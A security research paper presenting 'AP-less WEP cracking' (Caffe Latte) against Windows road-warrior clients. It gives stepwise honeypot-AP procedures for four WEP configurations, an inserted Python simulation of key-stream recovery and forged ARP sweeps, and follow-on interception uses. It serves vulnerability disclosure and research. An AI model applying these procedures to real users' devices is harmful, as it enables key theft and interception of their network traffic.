
Cafe Latte with a Free Topping of Cracked WEP - Retrieving WEP Keys From Road-Warriors
Md Sohail Ahmad, Vivek Ramachandran

1. Abstract:

Our talk aims at debunking the age-old myth that to crack WEP the attacker needs to be in the RF vicinity of the authorized network, with at least one functional AP up and running. We will demonstrate that it is possible to retrieve the WEP key from an isolated Client (the Client can be on the Moon!) using a new technique called "AP-less WEP Cracking". After our presentation, pen-testers will no longer need to drive up to a parking lot to crack WEP. For corporations ignorant enough to still use WEP, it means that their WEP keys can be cracked while one of their employees is transiting through an airport, having a cup of coffee, or catching some sleep in a hotel room. Our discovery also has a significant impact on the way honey-pots work today and will take them to the next level of sophistication.

At its core, our attack combines behavioral characteristics of the Windows wireless stack with already known flaws in WEP. Depending upon the network configuration of the authorized network, we will show that it is possible to recover the WEP key from an isolated Client within a time ranging from a few minutes to several hours. During our talk we will demonstrate our technique and release a tool built on top of the open source Madwifi-ng driver to automate these attacks. Although our talk centres on wireless Clients running a Windows operating system, the core idea can easily be used to find similar attacks for other operating systems. Before we discuss our attack, let us look at the behavioral characteristics and flaws we will exploit.

2. Attack Background:

Let us first look at the wireless behavior of a Windows Client:

A. When a Windows laptop successfully connects to a wireless network, it stores the network SSID in a list called the Preferred Network List (PNL). Simply put, the PNL is a way to remember networks the user has already connected to, so that Windows can automatically connect to them the next time they are available, without user intervention. The PNL is maintained across reboots.

B. When a Windows laptop connects to a WEP encrypted network, it stores the WEP key locally so that it can reconnect later without prompting the user. This keeps the user experience seamless when occasional disconnects happen.

C. On switching on the wireless interface, a Windows laptop probes for every SSID in its PNL and connects to any of them that is available in the current location. This allows an attacker monitoring the air to learn the SSIDs in the Client's PNL.

D. After a successful Authentication and Association with the AP, a Windows laptop configured for DHCP behaves as follows:
1) It sends a few DHCP Discover packets (around 3+) to obtain an IP address.
2) If it receives no reply, it assigns itself an address in the range 169.254.0.0 - 169.254.255.255 (the link-local /16, an address space of approximately 65,000 addresses).
3) It stays parked on this address and keeps sending DHCP Discover packets every few seconds to check whether any DHCP server responds.

E. After a successful Authentication and Association with an AP, a Windows laptop configured with a static IP for the wireless interface sends out around 3+ Gratuitous ARP packets announcing its static IP address.

F. If a Windows laptop connects to an Access Point and then receives a De-Authentication message from the AP, it immediately reconnects to the AP.

The flaws in WEP which we use in our attacks:

A. WEP has no mutual authentication. Only the Client has to authenticate itself to the AP; the AP never has to authenticate itself to the Client.

B. WEP is cryptographically broken, and WEP cracking works by collecting either or both of:
1) WEP encrypted data packets, using the Initialization Vector (IV) and the first two encrypted bytes to crack the WEP key with the FMS and KoreK statistical conditions;
2) WEP encrypted data packets with known plaintext, using the IV and the recovered key stream to crack the WEP key with the PTW attack. The current implementation of the PTW attack uses ARP packets, because the first bytes of an ARP packet (LLC/SNAP header and ARP header) are fixed and therefore known.

3. The Attack:

A WEP encrypted network uses one of the following configurations:
A. Shared Authentication
1) DHCP IP
2) Static IP
B. Open Authentication
1) DHCP IP
2) Static IP

In practice, case (A1), Shared Authentication with DHCP, seems to be the most prevalent configuration in wireless network deployments. We will now discuss how to recover the WEP key for each of these configurations with just an isolated wireless Client.

The basic idea behind our attack is as follows. We make the Client connect to our Honey-pot AP, which advertises the same SSID as the authorized network the Client is probing for. Once the Client is connected to the Honey-pot, we use various techniques to make it generate data packets encrypted with the authorized network's WEP key. Once we have enough of these packets, we can crack the WEP key. Our experiments have shown that for the most popular deployment, Shared Authentication with DHCP, the WEP key can be cracked in around 20-24 minutes. For all other configurations it takes several hours.

Note that the Authentication Request frame sent by the Client carries an authentication algorithm number that tells us whether the network it is trying to join uses Open or Shared Authentication, so we can set up the appropriate Honey-pot. Also, by looking at the size of the encrypted frames it is possible to tell DHCP Discover packets from ARP packets.

Let us now look at the techniques for each configuration type. For simplicity we assume the Client has a WEP encrypted network 'ABC' configured in its Preferred Network List (PNL). We now discuss how to recover the WEP key of 'ABC' from the isolated Client for each of the above configurations.
3.1 Shared Authentication:

Because Shared Key Authentication in WEP is flawed and WEP has no mutual authentication, a WEP Client can be made to Authenticate and Associate with a Honey-pot AP without the Honey-pot knowing the WEP key: the challenge/response exchange hands the attacker a valid (IV, key-stream) pair, and the Client never verifies the AP's Authentication Success message against anything.

3.1.1 The network 'ABC' has Shared Authentication with DHCP:

For this configuration we recover the WEP key using the following technique:

A. Monitor the air for Probe Request packets.
B. When we see a probe for the network 'ABC', we bring up a Honey-pot AP advertising the same SSID 'ABC'.
C. The Client sees our Honey-pot AP 'ABC' and sends an Authentication Request.
D. Our Honey-pot replies with a challenge text of 128 bytes.
E. The Client sends back a response containing the challenge text encrypted with the WEP key. This packet also carries the IV that was used with the WEP key to generate the key stream.
F. Our Honey-pot XORs the challenge text with the cipher text to obtain the corresponding key stream.
G. Our Honey-pot sends an Authentication Success to the Client.
H. The Client sends us an Association Request, to which our Honey-pot responds with a successful Association Response. The Client is now associated with us.
I. The Client now sends around 3 DHCP Discover messages, all as encrypted data packets.
J. Once the DHCP process times out, the Client assumes an address in the range 169.254.0.0 - 169.254.255.255 (a /16 of 65,536 addresses). This is also called the autoconfiguration (APIPA) address.
K. Our Honey-pot now uses the 128-byte key stream derived in step F to construct an ARP Request for every address in the above range.
L. Each ARP Request targets 169.254.x.y, claims to come from 169.254.x.z (the same subnet), and is encrypted with the IV and key stream obtained in step F.
M. Because we use a valid IV and key stream, the ICV verifies, so the Client accepts the packet and pushes it up the network stack.
N. The Client ignores all ARP Requests except the one addressed to it, and answers that one with an ARP Reply (encrypted, of course). This tells us which IP the Client is currently using. At around 100 ARP Requests per second we cover the entire space of 65,536 addresses in around 12-15 minutes.
O. Our Honey-pot has thus found the IP address of the Client.
P. Once it has the address, the Honey-pot keeps sending a large number of ARP Requests for that IP to the Client.
Q. The Client keeps answering with ARP Replies, generating more and more WEP encrypted data packets under the authorized network's key.
R. We store these WEP encrypted data packets generated by the Client.

The key stream obtained in step F through the shared authentication flaw is 128 bytes long, whereas an ARP Request over wireless needs only 36 bytes of payload (an 8-byte LLC/SNAP header plus a 28-byte ARP request) plus the 4-byte ICV, which WEP encrypts together with the payload, i.e. 40 bytes of key stream in total. Thus it is possible to construct a complete, correctly encrypted ARP Request without knowing the WEP key.
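The following is an added example and not the paper's or the authors' code (their tool was a modified Madwifi-ng driver). It is a pure-Python simulation of the shared-key key-stream recovery (steps D to F), the forged-ARP sweep of the 169.254.0.0/16 range (steps K to O), and the (IV, 16-byte key-stream) sample that the note at the end of section 3.1.2 says a PTW tool can consume. The 104-bit key, MAC addresses, IVs and the client's address are all constructed; frames are modelled as the WEP body only (3-byte IV, key-id byte, RC4-encrypted payload plus ICV), with no 802.11 headers and no radio I/O. It goes one step past the text in two places: the ICV of a known challenge is itself known, so the handshake yields 132 key-stream bytes rather than 128, and the forged ARP consumes 40 of them because the 4-byte ICV is encrypted along with the 36-byte payload.

```python
import os
import struct
import zlib
from functools import lru_cache

LLC_SNAP_ARP = b"\xaa\xaa\x03\x00\x00\x00\x08\x06"                   # 8-byte LLC/SNAP header, EtherType ARP
ARP_REQ_PREFIX = LLC_SNAP_ARP + b"\x00\x01\x08\x00\x06\x04\x00\x01"  # the 16 fixed bytes of every ARP request
WEP_ARP_FRAME_LEN = 4 + 36 + 4                                       # IV/key-id + (LLC 8 + ARP 28) + ICV

@lru_cache(maxsize=None)
def rc4_keystream(key, n):
    # Cached only so the address sweep runs fast; RC4 output depends on IV||key alone.
    s, j = list(range(256)), 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def icv(data):
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def wep_encrypt(key, iv, plaintext):
    body = plaintext + icv(plaintext)                                # the ICV is encrypted as well
    return iv + b"\x00" + xor(body, rc4_keystream(iv + key, len(body)))

def wep_decrypt(key, frame):
    # Returns the plaintext, or None when the ICV fails (a client drops such frames silently).
    pt = xor(frame[4:], rc4_keystream(frame[:3] + key, len(frame) - 4))
    return pt[:-4] if icv(pt[:-4]) == pt[-4:] else None

def build_arp(opcode, sender_mac, sender_ip, target_mac, target_ip):
    return LLC_SNAP_ARP + struct.pack("!HHBBH6s4s6s4s", 1, 0x0800, 6, 4, opcode,
                                      sender_mac, sender_ip, target_mac, target_ip)

class VictimClient:
    # Associated Windows client: holds the real key, sits on an APIPA address, answers only ARP for it.
    def __init__(self, key, mac, ip):
        self.key, self.mac, self.ip = key, mac, ip
    def shared_key_response(self, challenge):
        return wep_encrypt(self.key, os.urandom(3), challenge)           # step E
    def receive(self, frame):
        data = wep_decrypt(self.key, frame)
        if data is None or data[:8] != LLC_SNAP_ARP:
            return None
        op, smac, sip, tip = struct.unpack("!6xH6s4s6x4s", data[8:36])
        if op != 1 or tip != self.ip:
            return None                                                  # step N: not for us
        reply = build_arp(2, self.mac, self.ip, smac, sip)
        return wep_encrypt(self.key, os.urandom(3), reply)               # fresh IV, real key

class HoneypotAP:
    # Attacker side: never learns the key, holds a single (IV, key-stream) pair.
    def __init__(self):
        self.iv, self.keystream, self.captured = None, None, []
    def run_shared_key_auth(self, client):
        challenge = os.urandom(128)                                      # step D
        response = client.shared_key_response(challenge)                 # step E
        # The ICV over a known plaintext is known too, so step F yields 132 key-stream bytes, not 128.
        self.iv = response[:3]
        self.keystream = xor(challenge + icv(challenge), response[4:])
    def forge(self, plaintext):
        body = plaintext + icv(plaintext)                                # 36 + 4 = 40 bytes for an ARP
        return self.iv + b"\x00" + xor(body, self.keystream)             # steps K/L: same IV every time
    def find_client_ip(self, client, attacker_mac):
        # Steps K-O: one request per 169.254.x.y; the reply is recognised by its size, never decrypted.
        for x in range(256):
            for y in range(256):
                target = bytes((169, 254, x, y))
                sender = bytes((169, 254, x, (y + 1) & 0xFF))            # same /24, as in step L
                reply = client.receive(self.forge(build_arp(1, attacker_mac, sender, b"\x00" * 6, target)))
                if reply is not None and len(reply) == WEP_ARP_FRAME_LEN:
                    self.captured.append(reply)                          # step R material
                    return target
        return None

def ptw_record(frame):
    # (IV, first 16 key-stream bytes) of an encrypted ARP request: the known-plaintext sample PTW tools use.
    return frame[:3], xor(frame[4:20], ARP_REQ_PREFIX)

def demo():
    key = bytes.fromhex("0123456789abcdef0123456789")                    # constructed 104-bit key
    victim = VictimClient(key, b"\x00\x11\x22\x33\x44\x55", bytes((169, 254, 19, 42)))
    ap = HoneypotAP()
    ap.run_shared_key_auth(victim)
    found = ap.find_client_ip(victim, b"\x66\x77\x88\x99\xaa\xbb")
    return ap, victim, found
```

demo() sweeps about 4,900 addresses before 169.254.19.42 answers; on air, the roughly 100 requests per second quoted above is the real bound, not the XOR. The honeypot's captured list holds the client's encrypted ARP Reply, which it cannot read (the reply carries a fresh IV) but which is exactly the material steps P to R accumulate for the PTW attack, and ptw_record() shows that each forged request, carrying the handshake IV, doubles as one known-plaintext sample.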

Note that we have made the Client generate ARP Reply packets under the authorized network's WEP key without ourselves needing to know that key. After collecting a large enough trace of these ARP packets, we can use a WEP cracker such as Aircrack-ptw, which implements the PTW attack on ARP packets, to crack the key. It took us around 20-24 minutes to crack 104-bit WEP keys using this technique.

3.1.2 The network 'ABC' has Shared Authentication and Static IP configuration:

In this configuration we use only the Shared Authentication flaw and the Gratuitous ARP packets the Client generates, since the static IP assigned to the Client is unknown to us and, unlike the DHCP case, cannot be found by sweeping a small address range. The technique works as follows:

A. Monitor the air for Probe Request packets from the Client.
B. When we see a probe for the network 'ABC', we bring up a Honey-pot AP with the same SSID 'ABC'.
C. The Client sees the Honey-pot network 'ABC' and sends an Authentication Request.
D. Our Honey-pot replies with a challenge text of 128 bytes.
E. The Client sends back a response containing the challenge text encrypted with the WEP key and an IV.
F. Our Honey-pot XORs the challenge text with the cipher text to obtain the corresponding key stream.
G. Our Honey-pot sends an Authentication Success to the Client.
H. The Client Associates with us.
I. As the Client is configured with a static IP, it sends out around 3 Gratuitous ARP Requests in quick succession announcing its IP. These packets are encrypted with the authorized network's WEP key.
J. Our Honey-pot has thus collected around 4 encrypted packets (the encrypted challenge response plus the Gratuitous ARPs).
K. Our Honey-pot now sends a De-Authentication packet to the Client.
L. The Client gets disconnected and reconnects to our Honey-pot.
M. The cycle from C to L repeats.

We have experimentally verified that over time the Client generates enough WEP encrypted packets for an attacker to crack the key. It took us around 6 hours to crack 104-bit WEP keys using this technique.

Another point worth noting: the PTW attack in its current implementation works from an IV together with the first 16 bytes of the corresponding key stream. The key stream derived from the Shared Authentication exchange in steps D, E and F is therefore directly usable as input to the PTW tools, giving one (IV, key-stream) sample per Association.

3.2 Open Authentication:

We will now discuss how to derive the WEP key from an isolated Client for networks which use Open Authentication. With Open Authentication there is no challenge/response exchange and hence no key stream to forge packets with, so the Client has to be made to produce encrypted traffic on its own, and the reconnect behavior described in point F of section 2 is used to repeat that as often as needed.

3.2.1 The network 'ABC' has Open Authentication and DHCP configuration:

For this configuration we retrieve the WEP key as follows:

A. Monitor the air for Probe Request packets.
B. When we see a probe for the network 'ABC', we bring up a Honey-pot AP with the same SSID 'ABC'.
C. The Client sees our Honey-pot network 'ABC' and sends an Authentication Request.
D. Our Honey-pot sends back an Authentication Success message.
E. The Client sends us an Association Request, to which we respond with a successful Association Response.
F. Once Associated, the Client sends out around 3 DHCP Discover messages encrypted with the 'ABC' network's WEP key.
G. As the Client receives no reply to these DHCP Discovers, it configures itself with an autoconfiguration address between 169.254.0.0 and 169.254.255.255.
H. The Client then sends out 3 Gratuitous ARP packets announcing its IP address to the network.
I. All the DHCP and ARP packets are encrypted with the WEP key of the network 'ABC'.
J. Our Honey-pot now sends a De-Authentication packet to the Client.
K. The Client gets disconnected and tries to connect back to the Honey-pot.
L. Steps C to K repeat.

With the above technique it is possible to get around 6 WEP encrypted packets per Association. Note, however, that the DHCP process takes a couple of seconds to time out, which slows down data collection. We have observed that it is faster to send the De-Authentication packet as soon as we receive the very first encrypted packet (a DHCP Discover) from the Client. Although this yields just 1 data packet per Association, the much shorter cycle makes the technique faster overall and breaks the WEP key in a shorter time. Using this faster technique we were able to crack 104-bit keys in around 8-9 hours.
3.2.2 Open Authentication with Static IP configuration:

We use the following technique to crack the WEP key for this configuration:

A. Monitor the air for Probe Request packets.
B. When we see a probe for the network 'ABC', we bring up our Honey-pot AP with the same SSID 'ABC'.
C. The Client sees our Honey-pot 'ABC' and sends an Authentication Request.
D. Our Honey-pot replies with an Authentication Success packet.
E. The Client Associates with us.
F. After Associating, as the Client is configured with a static IP, it sends out around 3 Gratuitous ARP Requests in quick succession. These packets are encrypted with the authorized network's WEP key.
G. Our Honey-pot has thus collected 3 encrypted ARP packets.
H. Our Honey-pot now sends a De-Authentication packet to the Client.
I. The Client gets disconnected and reconnects to our Honey-pot.
J. The cycle from C to I repeats.

For every Association we collect 3 encrypted ARP packets sent under the authorized network's WEP key. Repeating this over time yields enough packets to crack the key with the PTW attack on ARP packets. In our experiments it took around 7-8 hours to crack 104-bit WEP keys.

4. Conclusion:

We have demonstrated that it is possible to recover the WEP key of any network in the PNL of an isolated Windows wireless Client, regardless of the network configuration. The beauty of our "AP-less WEP Cracking" technique lies in the fact that the Client may be on a plane, at home or anywhere else far away from the authorized network and still have that network's key compromised. Depending on the authentication and network configuration, the attacker can recover the key in a time frame ranging from a few minutes to several hours. For the most widely used configuration, Shared Authentication with DHCP, we have demonstrated key recovery within 20-24 minutes.

5. Once the WEP key is recovered:

Once we have broken the WEP key, we can do one or more of the following:

a. Bring up a Honey-pot AP with this WEP key. As we now know the key, we can decrypt packets sent by the Client and therefore answer its DHCP Discover with a DHCP response (Offer and Ack) that assigns it an IP address. If the Client uses a static IP, we assign ourselves an address in the same range. After this we can communicate with the Client at the IP layer.

b. As our technique does not require the attacker to be anywhere near the authorized wireless network, it is undetectable by any Wireless Intrusion Prevention System deployed on site. The current Windows wireless configuration utility does not detect or mitigate this attack either, leaving all Windows clients vulnerable.

6. Repercussions for Client Mis-association and Hotspot/Honey-pot attacks:

Until now, Client Mis-association and Honey-pot based attacks worked only if the SSID being probed by the Client belonged to an Open Authentication network with no WEP. An attacker without the WEP key could not exchange any meaningful data with the Client, even if he managed to spoof the Authentication and Association. With our attack the attacker can first break the WEP key of the WEP encrypted network the Client is probing for and then bring up a Honey-pot AP with the same SSID and WEP key. After this he can sniff, modify and exchange information with the Client and conduct every attack that was previously possible only against the Open Authentication, no-WEP case. We envision that our discovery will take Client Mis-association and Hotspot/Honey-pot attacks to the next level.

7. Code to be released:

We will release a custom Honey-pot AP built on top of the open source Madwifi-ng driver. This custom AP supports all the attacks discussed in this paper.

8. References

1. RC4 stream cipher basics. http://en.wikipedia.org/wiki/RC4
2. Wired Equivalent Privacy (WEP). http://en.wikipedia.org/wiki/Wired_Equivalent_Privacy
3. Fluhrer, Mantin and Shamir. Weaknesses in the Key Scheduling Algorithm of RC4. Selected Areas in Cryptography, 2001. http://www.wisdom.weizmann.ac.il/~itsik/RC4/Papers/Rc4_ksa.ps
4. KoreK's post on NetStumbler. http://www.netstumbler.org/showpost.php?p=89036
5. WEP Dead Again: Part 1. Infocus, SecurityFocus.com. http://www.securityfocus.com/infocus/1814
6. WEP Dead Again: Part 2. Infocus, SecurityFocus.com. http://www.securityfocus.com/infocus/1824
7. Wifi Honeypots a new hacker trap. SecurityFocus.com. http://www.securityfocus.com/news/552
8. Does Your Wi-Fi Hotspot Have an Evil Twin? PC World. http://www.pcworld.com/article/id,120054-page,1/article.html
9. Protect your Mobile Workers from Wireless Hotspot Phishing. http://www.ebcvg.com/articles.php?id=757
10. Wireless Honeypot Countermeasures. Infocus, SecurityFocus.com. http://www.securityfocus.com/infocus/1761
11. The PTW attack on WEP. http://www.cdc.informatik.tu-darmstadt.de/aircrack-ptw
12. Aircrack-ptw: WEP cracker using the PTW attack. http://www.cdc.informatik.tu-darmstadt.de/aircrack-ptw/download/aircrackptw-1.0.0.tar.gz
13. Aircrack-ng: WEP cracker. http://www.aircrack-ng.org/
14. AirSnort: WEP cracker. http://airsnort.shmoo.com/
15. WPA/WPA2, the replacement for WEP. http://en.wikipedia.org/wiki/WPA2


								